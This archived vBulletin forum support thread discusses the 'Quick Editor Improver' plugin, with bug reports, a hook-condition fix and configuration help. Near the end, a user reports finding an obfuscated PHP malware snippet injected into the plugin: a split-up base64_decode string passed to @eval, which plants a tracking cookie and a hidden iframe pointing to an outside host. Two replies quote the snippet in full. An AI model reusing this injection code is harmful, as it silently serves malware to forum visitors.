PDA

View Full Version : New Posting Features - Quick Editor Improver - Support Attachment


Pages : 1 [2]

sunrise2006
09-02-2009, 07:39 AM
Works perfectly, how do I font color of the bottom row ? Mine are white:

vB code is On, Smilies are On, [IMG] code is On, HTML code is Off
To make this changes, you may follow the templates that are started with 'imp_' prefix.

realdx
10-10-2009, 03:47 PM
How did I missed this?? Amazing work, thanks a lot!! MOTM!

EDIT: after installation, mod killed this other hack> https://vborg.vbsupport.ru/showthread.php?t=215447
When disabled from ACP/Products, the Smilies one went back to work. Any fix for this? Thanks! :)

BucWiLd
10-10-2009, 05:15 PM
I dont know i missed this also! great job, thank you!!!

sunrise2006
10-10-2009, 07:51 PM
How did I missed this?? Amazing work, thanks a lot!! MOTM!

EDIT: after installation, mod killed this other hack> https://vborg.vbsupport.ru/showthread.php?t=215447
When disabled from ACP/Products, the Smilies one went back to work. Any fix for this? Thanks! :)
While you have installed Quick Editor Improver, you don't need to installed any hack that designed for display similes on the Quick Reply and Quick Editor, because of Quick Editor Improver is this covers, you only need to activate it.

realdx
10-10-2009, 09:35 PM
So it's OR Editor Improver OR the Smilie hack? thanks!

sunrise2006
10-11-2009, 06:33 AM
So it's OR Editor Improver OR the Smilie hack? thanks!
It's all of thing that a Improved Editor is needed. Include smiles, font, size, color, attach, code and etc.

realdx
10-11-2009, 11:15 AM
Gotcha!! thank you for the explanation!! :)

mgurain
12-04-2009, 06:11 AM
When I enable this mod, a problem happens:
UNDO & REDO does not work !
I disabled it and they work now.
What is the solution ?
Thanks,,

Freesteyelz
12-22-2009, 03:59 AM
This hack is fantastic. Thank you, sunrise2006. :)

One thing I've noticed and I'm not sure if anyone else is experiencing it (testing on 3.8.4). When I have the attachments enabled the Quick Reply loads between 1 - 2 seconds slower than if it's disabled. It doesn't matter whether or not the attachment box is visible or if it's applied to Quick Reply or Quick Edit. It's not a big issue but I thought I'd mention it. :)

Taurus1
12-24-2009, 09:07 AM
This is a great Mod, thanks! Works great!! Just one thing please! I am trying to get this :

https://vborg.vbsupport.ru/showthread.php?t=202385

to work with yours. But for some reason I can't. Can you please help me!!?? Thank you!!

shofolofo
12-26-2009, 10:29 AM
does it work with v.4 ?

COL NIL SATIS
01-02-2010, 04:32 PM
Wow...this is fantastic!!!! thanks for this man..installed and rated 5

shofolofo
01-03-2010, 08:58 PM
Doesn't work for vb 4 :(

mgurain
01-19-2010, 06:29 AM
It was working fine for me,
but now it's not working, I reinstalled it but buttons are shown disabled by default !
What's wrong ?
please help..
Thanks,,

Orakk
01-20-2010, 10:36 AM
Should you have too much time on yer hands Sunrise do consider giving us a smilie below QR option please.

Working fine on 384, cheers..

AdamCap
02-10-2010, 05:41 PM
Are there any known plugin conflicts with this?

It was working for me, but at some point it stopped showing up on the quick reply form. Right now it appears as if the plugin isn't installed, though I do have it installed and enabled.

Makc666
02-12-2010, 09:18 AM
There is a BUG in this product.


User in his options sets : Message Editor Interface -> Basic Editor - A simple text box

After that the user tries to make a Quick Edit of any of his posts.
He will fail to do that.

He presses "Save" button in Ajax Quick Edit form

Forum will try to save the post
But it will fail to do so with JavaScript error

Line:1
Symbol:5436
Code:0
Error:Object needed
URL:https://vborg.vbsupport.ru/misc.php?do=qei_quickedit&v=384

And progress image https://vborg.vbsupport.ru/external/2011/01/5.gif is been shown.

This will continue until user will reload the page or will hit "Cancel" button.

The post will not be saved.


To go around this one we have to use:
$vbulletin->userinfo['showvbcode']

In other words, for example find this one:
if ($vbulletin->options['qeimp_enabled'])
and replace with this one:
if ($vbulletin->options['qeimp_enabled'] AND $vbulletin->userinfo['showvbcode'])


I have made such changes around the product.

Here they are:
<plugin active="1" executionorder="1">
<title>Cache Templates</title>
<hookname>cache_templates</hookname>
<phpcode><![CDATA[
if ($vbulletin->options['qeimp_enabled'] AND $vbulletin->userinfo['showvbcode'])

<plugin active="1" executionorder="1">
<title>Button Visibility Bitfields</title>
<hookname>global_start</hookname>
<phpcode><![CDATA[
if ($vbulletin->options['qeimp_enabled'] AND $vbulletin->userinfo['showvbcode'])

<plugin active="1" executionorder="1">
<title>vBulletin Blog Comments - Set Form Width</title>
<hookname>global_setup_complete</hookname>
<phpcode><![CDATA[
if (($vbulletin->options['qeimp_enabled'] AND $vbulletin->options['qei_qr_formwidth']) AND intval($vbulletin->options['qei_visiblebuttons']) > 0 AND $qei_apply AND $vbulletin->userinfo['showvbcode'])

<plugin active="1" executionorder="1">
<title>Improve Editor</title>
<hookname>editor_toolbar_start</hookname>
<phpcode><![CDATA[
global $qei_apply;
if ($qei_apply & $vbulletin->options['qei_show_postingrules_in_box'] AND $vbulletin->userinfo['showvbcode'])

<plugin active="1" executionorder="1">
<title>Improve Editor</title>
<hookname>editor_toolbar_end</hookname>
<phpcode><![CDATA[
if ($vbulletin->options['qeimp_enabled'] AND $qei_apply AND $vbulletin->userinfo['showvbcode'])

<plugin active="1" executionorder="1">
<title>SHOWTHREAD - Quick Attachment</title>
<hookname>showthread_post_start</hookname>
<phpcode><![CDATA[
if ($vbulletin->options['qeimp_enabled'] AND $qei_apply AND $vbulletin->userinfo['showvbcode'])

<plugin active="1" executionorder="1">
<title>AJAX Postbit QuickEdit with Attachments</title>
<hookname>ajax_start</hookname>
<phpcode><![CDATA[
if ($_POST['do'] == 'quickedit' AND $vbulletin->userinfo['showvbcode'])

<plugin active="1" executionorder="1">
<title>Prepare for Postbit QuickEdit - Attachments</title>
<hookname>newattachment_complete</hookname>
<phpcode><![CDATA[
if ($_REQUEST['qeiajax'] AND $vbulletin->userinfo['showvbcode'])

<plugin active="1" executionorder="1">
<title>Check Postbit Attachment Require - AJAX Mode</title>
<hookname>editpost_update_start</hookname>
<phpcode><![CDATA[
if (($vbulletin->GPC['ajax']) AND $qei_apply AND (2 & $vbulletin->options['qei_qr_show_attachment']) AND $vbulletin->userinfo['showvbcode'])

<plugin active="1" executionorder="1">
<title>Display Postbit - AJAX Mode</title>
<hookname>editpost_edit_ajax</hookname>
<phpcode><![CDATA[
if ($qei_apply AND (2 & $vbulletin->options['qei_qr_show_attachment']) AND $vbulletin->userinfo['showvbcode'])

<plugin active="1" executionorder="1">
<title>SHOWTHREAD - Quick Reply</title>
<hookname>showthread_complete</hookname>
<phpcode><![CDATA[
if ($vbulletin->options['qeimp_enabled'] AND $qei_apply AND $vbulletin->userinfo['showvbcode'])

Support
02-12-2010, 03:28 PM
Hi, thanks 4 the product
i have a lil problem in the visitor messages,
i cannot see the advanced setting of the product in visitor messages box.
112184

Support
02-13-2010, 07:11 AM
Any luck ?
i'm still waiting for you :(

and Makc666
Man i did not face that issue ?!
could u be more specified coz i wanna to double cheack on it.

sunrise2006
02-13-2010, 05:04 PM
Hi, thanks 4 the product
i have a lil problem in the visitor messages,
i cannot see the advanced setting of the product in visitor messages box.
112184
You're welcome.

Are you sure you have enabled Quick Editor Improver for the Visitor Messages through vBulletin Options?

vBulletin Options -> Quick Editor Improver -> Apply To
then checked the "Visitor Messages".

sunrise2006
02-13-2010, 05:09 PM
Thanks Makc666 (https://vborg.vbsupport.ru/member.php?u=26144), I think the reason of this BUG is that I have not checked it on the new version of vBulletin, because of to 3.8.0 who I have tested this problem is not exist, for this reason I want to say me which version of vBulletin you are used now that this problem occurred inside?

Support
02-13-2010, 07:31 PM
You're welcome.

Are you sure you have enabled Quick Editor Improver for the Visitor Messages through vBulletin Options?

vBulletin Options -> Quick Editor Improver -> Apply Tothen checked the "Visitor Messages".
Yes im sure.
Please help
www.mixlogy.com/vb ...... Test it

sunrise2006
02-14-2010, 11:12 AM
Yes im sure.
Please help
www.mixlogy.com/vb (http://www.mixlogy.com/vb) ...... Test it
Now I checked your forum, but I didn't found any problem! Because of for Visitor Message only Smiles could be added and this is correct for you.

Support
02-14-2010, 02:13 PM
Now i know where the problem from,
vBulletin Options > visitors messages settings
i choose to disable this codes from the visitor messages.


تفعيل كود BB Code Tags في رسائل الزوار
هذا الاعداد يسمح لك بتمكين وتعطيل استخدام أكواد BB codes المختلفة في رسائل الزوار.

ملاحظة ان اي تغييرات تجريها ستؤثر فقط في الرسائل المرسله (او تحريرها) بعد هذه النقطه.

السماح بـ BB Code العادي
السماح بالألوان
السماح بالحجم
السماح بالخط
السماح بالتجانب BB Code
السماح بالقوائم LIST
السماح بالروابط
السماح بـ BB Code
السماح بكود PHP
السماح بكود HTML
بالسماج بكود بادراج الصور
السماح بالإقتباس
تفعيل اكواد BB المخصصة


Now i can open all the features .
Any way thank you :) Alla Akbar

sunrise2006
02-16-2010, 11:23 AM
Now i know where the problem from,
vBulletin Options > visitors messages settings
i choose to disable this codes from the visitor messages.



Now i can open all the features .
Any way thank you :) Alla Akbar
Okay. I'm glad that your problem was solved.

Just if you have installed this product for ever on your vBulletin board, mark this product as Installed, please.

Thank you.

bravoesdotcom
02-16-2010, 02:08 PM
nice this work :up:
btw, Can I ask him how to working back the tool post?
I'd think with this install can return to normal
example:
112415
where I went wrong?:(
sorry if i'm out of topic

sunrise2006
02-17-2010, 05:48 PM
nice this work :up:
btw, Can I ask him how to working back the tool post?
I'd think with this install can return to normal
example:
112415
where I went wrong?:(
sorry if i'm out of topic
Just specified area on picture is not working or all of editor tools?

biggeorge
02-17-2010, 06:12 PM
Installed and working perfect.

I so needed an attachment ability... thank you!

Simon Lloyd
02-17-2010, 06:49 PM
Sunrise, i have a different code tag on my site and added another button in my editor_on template, how can i turn these ON in PM quickreply?<td><img src="$stylevar[imgdir_editor]/separator.gif" width="6" height="16" alt="" /></td>
<td><div class="imagebutton" id="{$editorid}_cmd_wrap0_VBA"><img src="http://www.thecodecage.com/forumz/images/buttons/vba_but.png" width="40" height="40" alt="Wrap code in your code tags"/></div></td>

<td><img src="$stylevar[imgdir_editor]/separator.gif" width="6" height="16" alt="" /></td>
<td><div class="imagebutton" id="{$editorid}_cmd_wrap0_TTHIGHLIGHT"><img src="http://www.thecodecage.com/forumz/images/statusicon/highlight.png" width="60" height="25" alt="Inline text highlight" /></div></td>

I do not use or intend to use the normal code tag (#)

stator
02-18-2010, 09:59 AM
I have the same issue

Version: 3.8.1

Please, tell me again what I had to do, as these codes make me confused

:confused::eek:

a9713030
02-19-2010, 05:31 AM
the above code confused me,

ra3doo
02-19-2010, 09:05 PM
I Like it Very Much
100 %
Thanks

NeroSoft
02-20-2010, 10:04 AM
Very very good
Installed :)

Makc666
02-23-2010, 08:01 AM
Thanks Makc666 (https://vborg.vbsupport.ru/member.php?u=26144), I think the reason of this BUG is that I have not checked it on the new version of vBulletin, because of to 3.8.0 who I have tested this problem is not exist, for this reason I want to say me which version of vBulletin you are used now that this problem occurred inside?

I always test any product on latest clean version before submitting a bug.
So this one was tested on clean 3.8.4 version.
Also it was tested on two 3.8.4 running forums.

The reason of this bug is that when the user
who use Message Editor Interface -> Basic Editor - A simple text box
tries to save the post
the vBulletin refers to the hook which is used by this product.
And this product tries to save the information
using the data which is not accessible when Message Editor Interface -> Basic Editor - A simple text box is used by user.

That it.

I think you will agree with me that when Message Editor Interface -> Basic Editor - A simple text box is used this product must not be called via hooks!

kau
03-02-2010, 04:11 PM
I get this error when editing a post. Disabling this plugin fixes it:

Webpage error details

User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)
Timestamp: Tue, 2 Mar 2010 17:59:04 UTC


Message: Object required
Line: 1
Char: 5436
Code: 0
URI: http://www.domain.com/forum/misc.php?do=qei_quickedit&v=384

Makc666
03-10-2010, 08:23 AM
I get this error when editing a post. Disabling this plugin fixes it:

Fix is here -> #1980648

saxahan
04-12-2010, 03:20 PM
Thanks a lot. installed ;)

Seshat Diva
07-19-2010, 01:23 PM
I have had this hack installed, used it and loved it. :) Now, since I'm using the new vB 4.0 version it isn't usable. Is there a new version of this "Quick Editor Improver" for use in the new 4.0 version ~or~ an update for use of this hack in 4.0 expected soon? Thanks for any information anyone can share!

sunrise2006
07-19-2010, 01:37 PM
I have had this hack installed, used it and loved it. :) Now, since I'm using the new vB 4.0 version it isn't unusable. Is there a new version of this "Quick Editor Improver" for use in the new 4.0 version ~or~ an update for use of this hack in 4.0 expected soon? Thanks for any information anyone can share!
Yes, I'm now working on new version, that can be installed on vBulletin 4, and I will put in here as soon as possible.

Simon Lloyd
07-19-2010, 04:57 PM
Hamed nice to see you back :)

Seshat Diva
07-20-2010, 02:41 AM
Yes, I'm now working on new version, that can be installed on vBulletin 4, and I will put in here as soon as possible.

Wonderful!! :) Can't wait!! :) I really, really, really miss this editor feature!! Thanks so much for your time in creating this great editor mod for 4.0 users!! :)

acyk
07-20-2010, 09:01 PM
Dear sir

thanks for your great work !!

I have a little question need your help .

your quick attachment idea is great , i love it very much

but the output of the "insert all" shows

[ attach ] 3232342 [ /attach ]

[ attach ] 3232343 [ /attach ]

could we just turn it into the other way , for example , if it is image , then output

[ img ] http: //forumsURL/attachment.php?attachmentid=3232342&stc=1&d=1279660446 [ /img]

[ img ] http: //forumsURL/attachment.php?attachmentid=3232343&stc=1&d=1279660446 [ /img]

Can you help me to do this ?

thanks a lot

sunrise2006
07-21-2010, 06:34 PM
Dear sir

thanks for your great work !!

I have a little question need your help .

your quick attachment idea is great , i love it very much

but the output of the "insert all" shows

[ attach ] 3232342 [ /attach ]

[ attach ] 3232343 [ /attach ]

could we just turn it into the other way , for example , if it is image , then output

[ img ] http: //forumsURL/attachment.php?attachmentid=3232342&stc=1&d=1279660446 [ /img]

[ img ] http: //forumsURL/attachment.php?attachmentid=3232343&stc=1&d=1279660446 [ /img]


Can you help me to do this ?

thanks a lot
Since I have made up this modification, more than one year is up, so to answer this question, I need to reviewing "Quick Editor Improver" modification, that it can need to a little break. I will answer you as soon as possible.

tgralex
07-28-2010, 08:12 PM
I have installed it, but all my custom BB codes still don't appear on quick reply panel...
I tried to use "Visible Custom" option, but any tag I put there getting rejected.
What do I do wrong?

sunrise2006
07-29-2010, 07:27 AM
I have installed it, but all my custom BB codes still don't appear on quick reply panel...
I tried to use "Visible Custom" option, but any tag I put there getting rejected.
What do I do wrong?
If you want to show custom BBCode(s) on the editor, you may need to specify an image for that BBCode.

tgralex
07-29-2010, 12:35 PM
If you want to show custom BBCode(s) on the editor, you may need to specify an image for that BBCode.
Almost everyone of my BB codes have an image. But which switch/checkbox turns them on to show? Because by default it didn't work.

tgralex
07-29-2010, 12:52 PM
Almost everyone of my BB codes have an image. But which switch/checkbox turns them on to show? Because by default it didn't work.
Found what was the problem - when choose "Visible Custom" check box, I should not try to put anything in the edit box showing when you select, just check and that makes the trick :)

tgralex
07-29-2010, 12:59 PM
Ok... now a different issue :)
I have more BB codes then it fits in the bar (like 5).
I tried to use option "Quick Reply - Form Width" where it says
If buttons over quick reply are outside of the box, you may use this option to specify fit form width.

Note that you may set form width via Style Manager for each style too.
If that is the place, what should I put in there? I tried random numbers from 1 to 300 - result the same: the quick reply stretches to my page width (which is fine) and my regular post edit/new screen is aligned left (which is kinda weird).
I can certainly live with that, but how should I handle that, if it is fixable?
Thank you!

sunrise2006
07-29-2010, 01:13 PM
Ok... now a different issue :)
I have more BB codes then it fits in the bar (like 5).
I tried to use option "Quick Reply - Form Width" where it says

If that is the place, what should I put in there? I tried random numbers from 1 to 300 - result the same: the quick reply stretches to my page width (which is fine) and my regular post edit/new screen is aligned left (which is kinda weird).
I can certainly live with that, but how should I handle that, if it is fixable?
Thank you!
Every template that started with imp_ prefix is related to this modification, and you may edit by yourself.

acyk
07-29-2010, 05:32 PM
Since I have made up this modification, more than one year is up, so to answer this question, I need to reviewing "Quick Editor Improver" modification, that it can need to a little break. I will answer you as soon as possible.

Great , Thanks for your reply , or maybe you can just release a new mod with this idea .

thanks again , and awaiting your good news

kau
08-06-2010, 03:56 PM
FYI this plugin is a security risk. Someone was able to inject into this plugin some malware that served a cookie for dotur.

Found this when we dumped the plugin:

$muuu = "ba"."se6"."4_de"."cod"."e"; @eval($muuu("aWYgKCFpc3NldCgkX0NPT0tJRVsnRG90dXInXSkpIHsNCiR4Yi A9IGFycmF5KCdNU0l FJywnTXlJRScsJ0lFJywnRmlyZWZveCcsJ09wZXJhJywnTmV0c 2NhcGUnLCdDaHJvbWUnLCdTYWZhcmk nLCdNZWRpYSBDZW50ZXInKTsNCiRpZnJhbmQgPSBtdF9yYW5kK DAsMTIzKTsNCiRkb21iID0gImh0dHA 6Ly93d3cua2VrbGxhZC5jby5jYy9nYWJsLnBocCI7DQpmb3JlY WNoICgkeGIgYXMgJHhiYikgew0KaWY oc3Ryc3RyKHN0cnRvbG93ZXIoJF9TRVJWRVJbJ0hUVFBfVVNFU l9BR0VOVCddKSxzdHJ0b2xvd2VyKCR 4YmIpKSkgew0KZWNobyA8PDxISkoNCjxzY3JpcHQ+DQpmdW5jd GlvbiBTZXRDb29raWUoY29va2llTmF tZSxjb29raWVDb250ZW50KXsNCiB2YXIgY29va2llUGF0aCA9I CcvJzsNCiB2YXIgZXhwRGF0ZT1uZXc gRGF0ZSgpOw0KIGV4cERhdGUuc2V0VGltZShleHBEYXRlLmdld FRpbWUoKSszNzI4MDAwMDApICA7DQo gdmFyIGV4cGlyZXM9ZXhwRGF0ZS50b0dNVFN0cmluZygpOw0KI GRvY3VtZW50LmNvb2tpZT1jb29raWV OYW1lKyI9Iitlc2NhcGUoY29va2llQ29udGVudCkrIjtwYXRoP SIrZXNjYXBlKGNvb2tpZVBhdGgpKyI 7ZXhwaXJlcz0iK2V4cGlyZXM7IA0KfQ0KU2V0Q29va2llKCJEb 3R1ciIsICJ0dXJrIik7DQo8L3Njcml wdD4NCjxpZnJhbWUgbmFtZT0iJGlmcmFuZCIgd2lkdGg9IjEiI GhlaWdodD0iMSIgc2Nyb2xsaW5nPSJ ubyIgZnJhbWVib3JkZXI9Im5vIiBtYXJnaW53aWR0aD0iMCIgb WFyZ2luaGVpZ2h0PSIwIiBzcmM9IiR kb21iIj48L2lmcmFtZT4NCkhKSjsNCmJyZWFrOw0KIH0NCiB9D Qp9"));

Simon Lloyd
08-07-2010, 11:24 AM
FYI this plugin is a security risk. Someone was able to inject into this plugin some malware that served a cookie for dotur.

Found this when we dumped the plugin:

$muuu = "ba"."se6"."4_de"."cod"."e"; @eval($muuu("aWYgKCFpc3NldCgkX0NPT0tJRVsnRG90dXInXSkpIHsNCiR4Yi A9IGFycmF5KCdNU0lFJywnTXlJRScsJ0lFJywnRmlyZWZveCcs J09wZXJhJywnTmV0c2NhcGUnLCdDaHJvbWUnLCdTYWZhcmknLC dNZWRpYSBDZW50ZXInKTsNCiRpZnJhbmQgPSBtdF9yYW5kKDAs MTIzKTsNCiRkb21iID0gImh0dHA6Ly93d3cua2VrbGxhZC5jby 5jYy9nYWJsLnBocCI7DQpmb3JlYWNoICgkeGIgYXMgJHhiYikg ew0KaWYoc3Ryc3RyKHN0cnRvbG93ZXIoJF9TRVJWRVJbJ0hUVF BfVVNFUl9BR0VOVCddKSxzdHJ0b2xvd2VyKCR4YmIpKSkgew0K ZWNobyA8PDxISkoNCjxzY3JpcHQ+DQpmdW5jdGlvbiBTZXRDb2 9raWUoY29va2llTmFtZSxjb29raWVDb250ZW50KXsNCiB2YXIg Y29va2llUGF0aCA9ICcvJzsNCiB2YXIgZXhwRGF0ZT1uZXcgRG F0ZSgpOw0KIGV4cERhdGUuc2V0VGltZShleHBEYXRlLmdldFRp bWUoKSszNzI4MDAwMDApICA7DQogdmFyIGV4cGlyZXM9ZXhwRG F0ZS50b0dNVFN0cmluZygpOw0KIGRvY3VtZW50LmNvb2tpZT1j b29raWVOYW1lKyI9Iitlc2NhcGUoY29va2llQ29udGVudCkrIj twYXRoPSIrZXNjYXBlKGNvb2tpZVBhdGgpKyI7ZXhwaXJlcz0i K2V4cGlyZXM7IA0KfQ0KU2V0Q29va2llKCJEb3R1ciIsICJ0dX JrIik7DQo8L3NjcmlwdD4NCjxpZnJhbWUgbmFtZT0iJGlmcmFu ZCIgd2lkdGg9IjEiIGhlaWdodD0iMSIgc2Nyb2xsaW5nPSJuby IgZnJhbWVib3JkZXI9Im5vIiBtYXJnaW53aWR0aD0iMCIgbWFy Z2luaGVpZ2h0PSIwIiBzcmM9IiRkb21iIj48L2lmcmFtZT4NCk hKSjsNCmJyZWFrOw0KIH0NCiB9DQp9"));Someone can only inject in to php if your server is insecure, if you look over at vbulletin.com you will see a thread dedicated to making your vbulletin & server more secure.

sunrise2006
08-08-2010, 01:36 PM
FYI this plugin is a security risk. Someone was able to inject into this plugin some malware that served a cookie for dotur.

Found this when we dumped the plugin:

$muuu = "ba"."se6"."4_de"."cod"."e"; @eval($muuu("aWYgKCFpc3NldCgkX0NPT0tJRVsnRG90dXInXSkpIHsNCiR4Yi A9IGFycmF5KCdNU0lFJywnTXlJRScsJ0lFJywnRmlyZWZveCcs J09wZXJhJywnTmV0c2NhcGUnLCdDaHJvbWUnLCdTYWZhcmknLC dNZWRpYSBDZW50ZXInKTsNCiRpZnJhbmQgPSBtdF9yYW5kKDAs MTIzKTsNCiRkb21iID0gImh0dHA6Ly93d3cua2VrbGxhZC5jby 5jYy9nYWJsLnBocCI7DQpmb3JlYWNoICgkeGIgYXMgJHhiYikg ew0KaWYoc3Ryc3RyKHN0cnRvbG93ZXIoJF9TRVJWRVJbJ0hUVF BfVVNFUl9BR0VOVCddKSxzdHJ0b2xvd2VyKCR4YmIpKSkgew0K ZWNobyA8PDxISkoNCjxzY3JpcHQ+DQpmdW5jdGlvbiBTZXRDb2 9raWUoY29va2llTmFtZSxjb29raWVDb250ZW50KXsNCiB2YXIg Y29va2llUGF0aCA9ICcvJzsNCiB2YXIgZXhwRGF0ZT1uZXcgRG F0ZSgpOw0KIGV4cERhdGUuc2V0VGltZShleHBEYXRlLmdldFRp bWUoKSszNzI4MDAwMDApICA7DQogdmFyIGV4cGlyZXM9ZXhwRG F0ZS50b0dNVFN0cmluZygpOw0KIGRvY3VtZW50LmNvb2tpZT1j b29raWVOYW1lKyI9Iitlc2NhcGUoY29va2llQ29udGVudCkrIj twYXRoPSIrZXNjYXBlKGNvb2tpZVBhdGgpKyI7ZXhwaXJlcz0i K2V4cGlyZXM7IA0KfQ0KU2V0Q29va2llKCJEb3R1ciIsICJ0dX JrIik7DQo8L3NjcmlwdD4NCjxpZnJhbWUgbmFtZT0iJGlmcmFu ZCIgd2lkdGg9IjEiIGhlaWdodD0iMSIgc2Nyb2xsaW5nPSJuby IgZnJhbWVib3JkZXI9Im5vIiBtYXJnaW53aWR0aD0iMCIgbWFy Z2luaGVpZ2h0PSIwIiBzcmM9IiRkb21iIj48L2lmcmFtZT4NCk hKSjsNCmJyZWFrOw0KIH0NCiB9DQp9"));
I don't think this issue is related to this hack! I checked solution of this report, but I didn't lend anything.

tidefans
08-30-2010, 06:35 PM
I've looked through this thread and didn't find the answer to my question (if I overlooked it, please point it out)...

Whenever I use the private message quick reply, it sends a copy of my reply to the recipient AND to me. I do not want/need a copy. How do I remove this so that it only goes to the recipient?

Warlord
11-07-2010, 09:21 PM
Loving this hack so far. Great job!

mgurain
11-11-2010, 03:02 AM
Looking for 4.x version ?

Wonksta
11-24-2010, 05:06 AM
Everything works except the Smilies dropdown menu I have show smilies in other areas of forum set to Yes in BB Code options so I have no idea why this is happening.

DonBassa
11-24-2010, 09:49 AM
Asalam A'likum..

i installed it at my forum " vB 3.8.6 " but it ddnt work :) ,
my Qucik Reply still looks like normal one hehe..

Salam

DonBassa
11-24-2010, 10:12 AM
Asalam A'likum..

i installed it at my forum " vB 3.8.6 " but it ddnt work :) ,
my Qucik Reply still looks like normal one hehe..

Salam

I Checked " Apply To " Setting and everything okay there ,
but the mod still not workin'

Salam

IRANCITY
11-30-2010, 10:40 AM
https://vborg.vbsupport.ru/
how can i add it clear link tools ?

JacquiiDesigns
11-30-2010, 09:19 PM
Enable Attachment
Enable (Visible) attachment for which type of editors?

When I try setting these options in AdminCP - the boxes are unchecked when the page reloads and the attachments option does not show in quick editor.

Is there a fix for this please?

Jacquii.

yotsume
12-01-2010, 03:47 PM
Support for Mod: Photo Popup

Can you please add support for this mod: Photo Popup - Insert pictures easily from vB Albums, Photopost, vBGallery, Photoplog (https://vborg.vbsupport.ru/showthread.php?t=202385)

This mod had a button on the quick edit that your mod removed. It allowed us to quickly select and insert photos from our albums or galleries.

sunrise2006
12-06-2010, 02:27 PM
New version of this Mod is under constructing, which released date is Q1 2011.
Support for Mod: Photo Popup

Can you please add support for this mod: Photo Popup - Insert pictures easily from vB Albums, Photopost, vBGallery, Photoplog (https://vborg.vbsupport.ru/showthread.php?t=202385)

This mod had a button on the quick edit that your mod removed. It allowed us to quickly select and insert photos from our albums or galleries.
I will attention to support this mod (Photo Popup) for the new version.

Please just be patient.

yotsume
12-06-2010, 02:33 PM
Great news! Thanks, looking forward to the next version update. :)

Wonksta
12-06-2010, 10:45 PM
Sunrise any idea why the smilie button isn't showing for me on my other forums it shows fine. Wondering if you could point me in the right template section to have a look.

sunrise2006
12-07-2010, 06:34 PM
Sunrise any idea why the smilie button isn't showing for me on my other forums it shows fine. Wondering if you could point me in the right template section to have a look.
Are you sure that smiles option is set to TRUE on your board?

Wonksta
12-07-2010, 11:17 PM
Allow Smilies in Non Forum Specific Area YES
Allow BB Code in Non Forum Specific Areas YES
Allow [IMG] Code in Non Forum Specific Areas YES

:S

sunrise2006
12-08-2010, 07:18 AM
Allow Smilies in Non Forum Specific Area YES
Allow BB Code in Non Forum Specific Areas YES
Allow [IMG] Code in Non Forum Specific Areas YES

:S
Each of template that started with imp_ prefix is related to this modification. Please check for existence of templates with this prefix and inform me of those.

Wonksta
12-08-2010, 07:26 AM
Each of template that started with imp_ prefix is related to this modification. Please check for existence of templates with this prefix and inform me of those.

Attached thanks!

sunrise2006
12-08-2010, 07:43 AM
Attached thanks!
Whereas this image shows all of templates which this modification is needed to them are exists, so I don't think your problem is for because of templates!

Now I'm asked you about another extra buttons on quick editor toolbar, are they visible?

Wonksta
12-08-2010, 12:45 PM
Whereas this image shows all of templates which this modification is needed to them are exists, so I don't think your problem is for because of templates!

Now I'm asked you about another extra buttons on quick editor toolbar, are they visible?

Here are the buttons that appear.

sunrise2006
12-08-2010, 01:09 PM
Here are the buttons that appear.
You should find cause of your problem in vBulletin options (overall vBulletin CP), because I guess this problem is not through this modification.

Can you tell me your forum information by PM? Maybe I will able to figure out this problem.

Wonksta
12-09-2010, 12:44 AM
You should find cause of your problem in vBulletin options (overall vBulletin CP), because I guess this problem is not through this modification.

Can you tell me your forum information by PM? Maybe I will able to figure out this problem.
You were right!


Message Posting Interface Options > Smilie Menu Total Smilies '0'

This was causing the issue. Once I changed it to a higher number it magically appeared!

Thanks for your guidance sunrise!

Abu2
12-12-2010, 08:02 PM
Hi! I have a problem with attachment button on quick reply, it doesn't shown at all...
Also in adminCP i can't check and save 2 checkboxes to enable attachments, why?

sunrise2006
12-12-2010, 08:27 PM
Hi! I have a problem with attachment button on quick reply, it doesn't shown at all...
Also in adminCP i can't check and save 2 checkboxes to enable attachments, why?
Please more explain your problem. Can you put some screenshots of your problem here? (shots of Quick Editor Improver Options and Quick Reply area)

Abu2
12-12-2010, 08:40 PM
Please more explain your problem. Can you put some screenshots of your problem here? (shots of Quick Editor Improver Options and Quick Reply area)

Yes, sure. I've no any template modifications. it doesn't work even with default skin.
Vb 3.8.4

JacquiiDesigns
12-12-2010, 11:11 PM
Yes, sure. I've no any template modifications. it doesn't work even with default skin.
Vb 3.8.4

I posted this same issue and got no answer. But I found a solution on my own - well - not particularly a solution, but a work-around. And it may work for you as well.

What I did was to disable the plugins/hook system completely ((AdminCP --> vB Options --> vB Options --> Plugin/Hook System --> check no and save))

THEN browse to your Quick Editor Improver settings and edit settings to your preference. Save the settings - then re-enable the plugin/hook system.

HTH ;)

Jacquii.

Abu2
12-13-2010, 11:24 AM
JacquiiCooke It works! =) Thank you

JacquiiDesigns
12-13-2010, 10:08 PM
JacquiiCooke It works! =) Thank you

Good! You're welcome ;)

Abu2
12-15-2010, 03:26 PM
ha-ha, it's not over yet!

...

Abu2
12-18-2010, 12:12 PM
The problem was in the "Lucky thread" mod... *Fixed*

IRANCITY
12-18-2010, 06:56 PM
PLZ add unlink bottom
how can i add it ?
http://forum.iecloob.com/images/editor/unlink.gif

ITQalam
05-01-2011, 03:28 AM
AmaZing Thx

Meola
06-10-2011, 01:15 PM
Thanks for this awesome mod, but I think there is a problem with this mod, after enabling attachments, this button https://vborg.vbsupport.ru/external/2011/06/15.gif does not work properly.
Is there any fix for this?

Nook_Neformat
06-14-2011, 06:02 PM
are there any way to use only quick edit, not quick reply?

Simon Lloyd
06-14-2011, 06:23 PM
are there any way to use only quick edit, not quick reply?AdminCp>Message Posting and Editing Options>Quick Reply set it to No :)

Nook_Neformat
06-14-2011, 07:29 PM
thanks, but i need to use quick reply, just with other hack :)

Simon Lloyd
06-14-2011, 08:24 PM
What? you said Originally Posted by Nook_Neformat
are there any way to use only quick edit, not quick reply?
Then you say you want to use it? make up your mind :)

Nook_Neformat
06-14-2011, 08:32 PM
i mean i want to use only the part of this hack that improves quick edit, because i already have great hack that improves quick reply

Scyther
06-24-2011, 09:05 AM
tagged for now

Rafael?
06-24-2011, 02:04 PM
thanks!

Tortikova
05-29-2012, 09:55 AM
I have problem with short messages. (The minimum message length)

Quick reply not show message:
"Type your message is too short. Increase your message up to 10 characters long."

Do you know, how repair it problem?

Simon Lloyd
05-29-2012, 05:08 PM
I have problem with short messages. (The minimum message length)

Quick reply not show message:
"Type your message is too short. Increase your message up to 10 characters long."


Do you know, how repair it problem?It's not a problem it's in your vbulletin options!

Tortikova
05-30-2012, 09:27 AM
It's not a problem it's in your vbulletin options!

